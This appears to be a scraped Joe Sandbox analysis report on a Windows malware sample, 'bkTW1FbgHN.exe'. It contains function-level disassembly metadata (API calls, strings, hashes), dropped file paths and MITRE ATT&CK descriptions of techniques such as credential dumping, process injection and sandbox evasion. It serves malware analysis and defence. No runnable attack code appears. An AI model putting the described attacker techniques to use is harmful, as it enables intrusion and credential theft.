Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: dd134ad5af5f7a655f37f96281c2f7f73353bffd5d710e57cfca3f88b8818062
Instruction ID: de849595f183878972ef2c8393f20cfb3c7cf021cb311f0b7d28e746fd352ea8
Opcode Fuzzy Hash: dd134ad5af5f7a655f37f96281c2f7f73353bffd5d710e57cfca3f88b8818062
Instruction Fuzzy Hash: 1811C270541625FAEB268F958C8CEFBFFACFF06655F00826AFA9586080D2705994C6F0

Function 00FE8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FE8E73

Strings

ListBox, xrefs: 00FE8E3D
ComboBox, xrefs: 00FE8E12

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3c4abda596341517f09f831e1ce33bcd5e1da7b7b6671da01a6aa3d3d20c9b81
Instruction ID: e5aa22a40a72d481aa6674ca8f101dbc17c43d341dd4add8bc692ac896ed24b7
Opcode Fuzzy Hash: 3c4abda596341517f09f831e1ce33bcd5e1da7b7b6671da01a6aa3d3d20c9b81
Instruction Fuzzy Hash: C501F1B1A41319ABAF15FBE1CC419FE7368AF05360B040A19F865A72E1DE39580CE750

Function 00FF8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FF8DAC
__fread_nolock.LIBCMT ref: 00FF8DC1

Strings

EA06, xrefs: 00FF8DF3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: a9c586b5802ac128faaa845d42df5deedc7930454b383c24a430126012fa5371
Instruction ID: 6be54291a4d0af2057dea7f9d454df1e4957fd3aafbada753154ed27e0de8b00
Opcode Fuzzy Hash: a9c586b5802ac128faaa845d42df5deedc7930454b383c24a430126012fa5371
Instruction Fuzzy Hash: 8501D672C042186EDB28CAA9CC56EFE7BF89F15711F00459EE552D2181E978E6049B60

Function 00FE8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00FE8D6B

Strings

ListBox, xrefs: 00FE8D35
ComboBox, xrefs: 00FE8D0A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8b82aec12a36f3c7274320d21a612fd8b1f283080da071639c38bf58b5638ee2
Instruction ID: 0cb9375289bdeab4be84ae3a7af5a6c73c1ee395011fa3ad4bd9b98ee58bfb88
Opcode Fuzzy Hash: 8b82aec12a36f3c7274320d21a612fd8b1f283080da071639c38bf58b5638ee2
Instruction Fuzzy Hash: 9901D4B1A41209ABEF25FBA1CD52AFE73A89F15750F100029B805672A1DE195E0CE671

Function 00FE8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00FE8DEE

Strings

ListBox, xrefs: 00FE8DBA
ComboBox, xrefs: 00FE8D8F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 773b834538d1263a6815b4213d6bf189afb7ee1aad218d735fb6ceaf303ffed0
Instruction ID: 45ef9ec7cdd10bc7a1366b49fa56252b25f1a5c5c6a7586422d45a75bead40fa
Opcode Fuzzy Hash: 773b834538d1263a6815b4213d6bf189afb7ee1aad218d735fb6ceaf303ffed0
Instruction Fuzzy Hash: E401F7B1A41209A7EF21FAA5CD42BFE73A88F15750F100029B845A3291DE195E0DF671

Function 00FF4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FF4F46
_wcscmp.LIBCMT ref: 00FF4F58

Strings

#32770, xrefs: 00FF4F52

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 044e78bb59c175d4fb218399005f063a8b0ee1f1bf26f83e0443eff35d5ca2a6
Instruction ID: 3142c722a242fbb37c0397cf5b0fb61ea66c5388666ee42b7b772ddf95db3fb0
Opcode Fuzzy Hash: 044e78bb59c175d4fb218399005f063a8b0ee1f1bf26f83e0443eff35d5ca2a6
Instruction Fuzzy Hash: 6CE09232A002292BD7209A9AAC49BA7F7ACEB45B70F01016BFD44D7045D565AA45CBE0

Function 00FCB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB314: _memset.LIBCMT ref: 00FCB321

Part of subcall function 00FB0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FCB2F0,?,?,?,00F9100A), ref: 00FB0945

IsDebuggerPresent.KERNEL32(?,?,?,00F9100A), ref: 00FCB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F9100A), ref: 00FCB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FCB2FE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 7c2299708b082d6764795736294ba9eec96be3b6a3db2f69e97e24077abf5f43
Instruction ID: 7af8118772f71ba3bce036a6f540517faaf587f2e1455203401bad482bf54b47
Opcode Fuzzy Hash: 7c2299708b082d6764795736294ba9eec96be3b6a3db2f69e97e24077abf5f43
Instruction Fuzzy Hash: 73E06D742003428FE730DF29E5067467AE8AF00314F00892CE486C7241EBBDE408DBA1

Function 00FD1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00FD1775

Part of subcall function 0100BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FD195E,?), ref: 0100BFFE
Part of subcall function 0100BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FD196D

Strings

WIN_XPe, xrefs: 00FD1788

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 1672b48fd30865e13b62c866383ad0dcc2a2d6a406f18cc35280456dafc7b3f0
Instruction ID: e9d9d224036889fdc29cad34ef1cc82806cad79b521a6dff7e20fc3ccf03912d
Opcode Fuzzy Hash: 1672b48fd30865e13b62c866383ad0dcc2a2d6a406f18cc35280456dafc7b3f0
Instruction Fuzzy Hash: 62F06D7180410AEFDB25DB90C594BECBBF9BB08300F580086E042A31A0CB7A4F88EF60

Function 01015964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0101596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01015981

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Strings

Shell_TrayWnd, xrefs: 01015967

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 05baa41c2092d74f11b168dfa6cdc779c8f025aa8e1deacd7ec248b1e8aae541
Instruction ID: 78a4ae72ff84476fde895bd35578c044fec0cbdb6b77d6fbfc897f68edc42eaa
Opcode Fuzzy Hash: 05baa41c2092d74f11b168dfa6cdc779c8f025aa8e1deacd7ec248b1e8aae541
Instruction Fuzzy Hash: 7DD0C931784712BBE674AA709C4FFA67A14BF04B50F000829B389AA1D9C9E99804C794

Function 01015998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010159AE
PostMessageW.USER32(00000000), ref: 010159B5

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Strings

Shell_TrayWnd, xrefs: 010159A7

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 21f71740872772cdc66f095d0c8c0de996c8ab20affc624e766671280b166444
Instruction ID: afe8aa733cb05f2890243b4b337e400252e93fb39459261b709b332f5690bd9c
Opcode Fuzzy Hash: 21f71740872772cdc66f095d0c8c0de996c8ab20affc624e766671280b166444
Instruction Fuzzy Hash: E1D0C9317807127BE674AA709C4FF967614BB04B50F000829B389AA1D9C9E9A804C794

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bkTW1FbgHN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-19f3pMI

C:\Users\user\AppData\Local\Temp\autB68F.tmp

C:\Users\user\AppData\Local\Temp\jailless

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
bkTW1FbgHN.exe

Function 00F93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00F949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00F94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00FF9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00F93015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00F93041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00F9708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00F93A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00F93633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00F93766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 01BDA130 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00F939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01BD9F10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

Function 00F9407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

